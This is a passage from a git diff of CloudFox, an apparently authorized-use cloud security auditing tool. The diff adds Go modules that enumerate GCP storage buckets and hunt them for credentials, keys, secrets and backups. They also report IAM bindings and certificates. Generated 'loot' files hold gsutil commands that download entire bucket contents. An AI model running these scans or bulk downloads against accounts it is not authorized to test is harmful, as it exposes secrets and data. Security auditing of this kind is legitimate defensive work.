"github.com/spf13/cobra" +) + +var ( + bucketEnumMaxObjects int +) + +var GCPBucketEnumCommand = &cobra.Command{ + Use: globals.GCP_BUCKETENUM_MODULE_NAME, + Aliases: []string{"bucket-scan", "gcs-enum", "sensitive-files"}, + Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", + Long: `Enumerate GCS buckets to find potentially sensitive files. + +This module scans bucket contents for files that may contain: +- Credentials (service account keys, SSH keys, certificates) +- Secrets (environment files, API keys, tokens) +- Configuration files (may contain hardcoded secrets) +- Database backups +- Terraform state files +- Source code/git repositories + +File categories detected: +- Credential: .json keys, .pem, .key, .p12, SSH keys +- Secret: .env, passwords, API keys, tokens +- Config: YAML, properties, settings files +- Backup: SQL dumps, archives +- Source: Git repositories +- Cloud: Cloud Functions source, build artifacts + +WARNING: This may take a long time for buckets with many objects. 
+Use --max-objects to limit the scan.`, + Run: runGCPBucketEnumCommand, +} + +func init() { + GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (0 for unlimited)") +} + +type BucketEnumModule struct { + gcpinternal.BaseGCPModule + SensitiveFiles []bucketenumservice.SensitiveFileInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BucketEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BucketEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + SensitiveFiles: []bucketenumservice.SensitiveFileInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (max %d objects per bucket)...", bucketEnumMaxObjects), globals.GCP_BUCKETENUM_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + + if len(m.SensitiveFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range m.SensitiveFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(m.SensitiveFiles), criticalCount, highCount), 
globals.GCP_BUCKETENUM_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + svc := bucketenumservice.New() + + // Get list of buckets + buckets, err := svc.GetBucketsList(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + // Scan each bucket + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) + continue + } + + m.mu.Lock() + m.SensitiveFiles = append(m.SensitiveFiles, files...) 
+ for _, file := range files { + m.addFileToLoot(file) + } + m.mu.Unlock() + } +} + +func (m *BucketEnumModule) initializeLootFiles() { + m.LootMap["bucket-enum-sensitive-commands"] = &internal.LootFile{ + Name: "bucket-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["bucket-enum-commands"] = &internal.LootFile{ + Name: "bucket-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInfo) { + // All files go to the general commands file + m.LootMap["bucket-enum-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + file.DownloadCmd, + ) + + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + m.LootMap["bucket-enum-sensitive-commands"].Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + file.DownloadCmd, + ) + } +} + +func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + // All files table + header := []string{ + "Project ID", + "Project Name", + "Bucket", + "Object Name", + "Category", + "Size", + "Public", + "Description", + } + + var body [][]string + for _, file := range m.SensitiveFiles { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + + body = append(body, []string{ + file.ProjectID, + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + 
formatFileSize(file.Size), + publicStatus, + file.Description, + }) + } + + // Critical/High risk files table (sensitive files) + sensitiveHeader := []string{ + "Project ID", + "Project Name", + "Bucket", + "Object Name", + "Category", + "Size", + "Public", + } + + var sensitiveBody [][]string + for _, file := range m.SensitiveFiles { + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + + sensitiveBody = append(sensitiveBody, []string{ + file.ProjectID, + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "bucket-enum", + Header: header, + Body: body, + }, + } + + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: sensitiveHeader, + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + output := BucketEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) + } +} + +func formatFileSize(bytes int64) string { + const ( + KB = 1024 + MB = KB * 1024 + GB = MB * 1024 + ) + + switch { 
+ case bytes >= GB: + return fmt.Sprintf("%.1f GB", float64(bytes)/GB) + case bytes >= MB: + return fmt.Sprintf("%.1f MB", float64(bytes)/MB) + case bytes >= KB: + return fmt.Sprintf("%.1f KB", float64(bytes)/KB) + default: + return fmt.Sprintf("%d B", bytes) + } +} diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a0a5944c..46dbd055 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -1,9 +1,13 @@ package commands import ( + "context" "fmt" + "strings" + "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -11,105 +15,334 @@ import ( var GCPBucketsCommand = &cobra.Command{ Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP buckets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available bucket information: -cloudfox gcp buckets`, + Aliases: []string{"storage", "gcs"}, + Short: "Enumerate GCP Cloud Storage buckets with security configuration", + Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. 
+ +Features: +- Lists all buckets accessible to the authenticated user +- Shows security configuration (public access prevention, uniform access, versioning) +- Enumerates IAM policies and identifies public buckets +- Shows encryption type (Google-managed vs CMEK) +- Shows retention and soft delete policies +- Generates gcloud commands for further enumeration +- Generates exploitation commands for data access + +Security Columns: +- Public: Whether the bucket has allUsers or allAuthenticatedUsers access +- PublicAccessPrevention: "enforced" prevents public access at org/project level +- UniformAccess: true means IAM-only (no ACLs), recommended for security +- Versioning: Object versioning enabled (helps with recovery/compliance) +- Logging: Access logging enabled (audit trail) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Retention: Data retention policy (compliance/immutability)`, Run: runGCPBucketsCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BucketsModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPBucketsResults struct { - Data []CloudStorageService.BucketInfo + // Module-specific fields + Buckets []CloudStorageService.BucketInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPBucketsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BucketsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "Location", - "ProjectID", +func (o BucketsOutput) TableFiles() []internal.TableFile { 
return o.Table } +func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBucketsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string + // Create module instance + module := &BucketsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Buckets: []CloudStorageService.BucketInfo{}, + LootMap: make(map[string]*internal.LootFile), + } - for _, value := range g.Data { - body = append( - body, - []string{ - value.Name, - value.Location, - value.ProjectID, - }, - ) + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Buckets) == 0 { + logger.InfoM("No buckets found", globals.GCP_BUCKETS_MODULE_NAME) + return } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_BUCKETS_MODULE_NAME, + // Count public buckets for summary + publicCount := 0 + for _, bucket := range m.Buckets { + if bucket.IsPublic { + publicCount++ + } } - tableFiles = append(tableFiles, tableFile) - return tableFiles + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(m.Buckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(m.Buckets)), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) } -// 
Decide what is loot based on resource information -func (g GCPBucketsResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Create service and fetch buckets + cs := CloudStorageService.New() + buckets, err := cs.Buckets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Buckets = append(m.Buckets, buckets...) + + // Generate loot for each bucket + for _, bucket := range buckets { + m.addBucketToLoot(bucket) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETS_MODULE_NAME) + } } -// Houses high-level logic that retrieves resources and writes to output -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BUCKETS_MODULE_NAME) +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BucketsModule) initializeLootFiles() { + m.LootMap["buckets-commands"] = 
&internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } +} - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BUCKETS_MODULE_NAME) +func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { + // All commands for this bucket + m.LootMap["buckets-commands"].Contents += fmt.Sprintf( + "## Bucket: gs://%s (Project: %s, Location: %s)\n"+ + "# Describe bucket:\n"+ + "gcloud storage buckets describe gs://%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n"+ + "# List objects:\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -L gs://%s/\n"+ + "# List all objects recursively:\n"+ + "gsutil ls -r gs://%s/**\n"+ + "# Get bucket size:\n"+ + "gsutil du -s gs://%s/\n"+ + "# Download all contents:\n"+ + "gsutil -m cp -r gs://%s/ ./loot/%s/\n"+ + "# Check for public access:\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, bucket.Name, + bucket.Name, + ) +} + +// ------------------------------ +// Helper functions +// ------------------------------ +func boolToYesNo(b bool) string { + if b { + return "Yes" } + return "No" +} - // Get the bucket info using the projectIDs and CloudStorageService - cs := CloudStorageService.New() - var results []CloudStorageService.BucketInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := 
parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - result, err := cs.Buckets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return +// getMemberType extracts the member type from a GCP IAM member string +func getMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Combined table with IAM columns (one row per IAM member) + header := []string{ + "Project ID", + "Project Name", + "Name", + "Location", + "Public", + "Versioning", + "Uniform Access", + "Encryption", + "Role", + "Member Type", + "Member", + } + + var body [][]string + publicCount := 0 + for _, bucket := range m.Buckets { + // Format public access + publicDisplay := "" + if bucket.IsPublic { + publicDisplay = bucket.PublicAccess + publicCount++ } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - cloudfoxOutput := GCPBucketsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BUCKETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + + // One row per IAM member + if len(bucket.IAMBindings) > 0 { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := getMemberType(member) + body = append(body, []string{ + bucket.ProjectID, + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Bucket with no IAM bindings + body = append(body, []string{ + bucket.ProjectID, + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + boolToYesNo(bucket.VersioningEnabled), + boolToYesNo(bucket.UniformBucketLevelAccess), + bucket.EncryptionType, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_BUCKETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } + + output := BucketsOutput{ + Table: tableFiles, + 
Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go new file mode 100644 index 00000000..51e25291 --- /dev/null +++ b/gcp/commands/certmanager.go @@ -0,0 +1,389 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCertManagerCommand = &cobra.Command{ + Use: globals.GCP_CERTMANAGER_MODULE_NAME, + Aliases: []string{"certs", "certificates", "ssl"}, + Short: "Enumerate SSL/TLS certificates and find expiring or misconfigured certs", + Long: `Enumerate SSL/TLS certificates from Certificate Manager and Compute Engine. 
+ +This module finds all certificates and identifies security issues: +- Expired or soon-to-expire certificates +- Failed certificate issuance +- Wildcard certificates (higher impact if compromised) +- Self-managed certificates that need manual renewal + +Security Relevance: +- Expired certificates cause outages and security warnings +- Wildcard certificates can be abused to MITM any subdomain +- Certificate domains reveal infrastructure and services +- Self-managed certs may have exposed private keys + +What this module finds: +- Certificate Manager certificates (global) +- Compute Engine SSL certificates (classic) +- Certificate maps +- Expiration status +- Associated domains`, + Run: runGCPCertManagerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CertManagerModule struct { + gcpinternal.BaseGCPModule + + Certificates []certmanagerservice.Certificate + SSLCertificates []certmanagerservice.SSLCertificate + CertMaps []certmanagerservice.CertificateMap + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CertManagerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CertManagerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CertManagerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CERTMANAGER_MODULE_NAME) + if err != nil { + return + } + + module := &CertManagerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Certificates: []certmanagerservice.Certificate{}, + SSLCertificates: []certmanagerservice.SSLCertificate{}, + CertMaps: []certmanagerservice.CertificateMap{}, + LootMap: 
make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) + + totalCerts := len(m.Certificates) + len(m.SSLCertificates) + + if totalCerts == 0 { + logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) + return + } + + // Count expiring/expired certs + expiringCount := 0 + expiredCount := 0 + + for _, cert := range m.Certificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + for _, cert := range m.SSLCertificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", + totalCerts, len(m.CertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + + if expiredCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + if expiringCount > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d certificate(s) expire within 30 days", expiringCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CertManagerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking certificates in project: %s", projectID), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + svc := certmanagerservice.New() + + // Get Certificate Manager certs + certs, err := svc.GetCertificates(projectID) + if err != nil { + 
m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificates in project %s", projectID)) + } + + // Get classic SSL certs + sslCerts, err := svc.GetSSLCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate SSL certificates in project %s", projectID)) + } + + // Get certificate maps + certMaps, err := svc.GetCertificateMaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificate maps in project %s", projectID)) + } + + m.mu.Lock() + m.Certificates = append(m.Certificates, certs...) + m.SSLCertificates = append(m.SSLCertificates, sslCerts...) + m.CertMaps = append(m.CertMaps, certMaps...) + + for _, cert := range certs { + m.addCertToLoot(cert) + } + for _, cert := range sslCerts { + m.addSSLCertToLoot(cert) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CertManagerModule) initializeLootFiles() { + m.LootMap["certmanager-details"] = &internal.LootFile{ + Name: "certmanager-details", + Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") + } + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") + } + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s%s\n"+ + "Project: %s 
| Location: %s\n"+ + "Type: %s | State: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, + cert.ProjectID, cert.Location, + cert.Type, cert.State, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) +} + +func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { + // Build flags for special attributes + var flags []string + if cert.Wildcard { + flags = append(flags, "WILDCARD") + } + if cert.Expired { + flags = append(flags, "EXPIRED") + } else if cert.DaysUntilExpiry <= 30 { + flags = append(flags, "EXPIRING") + } + if cert.SelfManaged { + flags = append(flags, "SELF-MANAGED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + "# %s (SSL Certificate)%s\n"+ + "Project: %s | Type: %s\n"+ + "Domains: %s\n"+ + "Expires: %s (%d days)\n\n", + cert.Name, flagStr, + cert.ProjectID, cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Combined certificates table + header := []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} + var body [][]string + + for _, cert := range m.Certificates { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.ProjectID, + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + for 
_, cert := range m.SSLCertificates { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.ProjectID, + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: header, + Body: body, + }) + } + + // Certificate maps table + if len(m.CertMaps) > 0 { + mapHeader := []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} + var mapBody [][]string + + for _, certMap := range m.CertMaps { + mapBody = append(mapBody, []string{ + m.GetProjectName(certMap.ProjectID), + certMap.ProjectID, + certMap.Name, + certMap.Location, + fmt.Sprintf("%d", certMap.EntryCount), + strings.Join(certMap.Certificates, ", "), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "certificate-maps", + Header: mapHeader, + Body: mapBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := CertManagerOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + 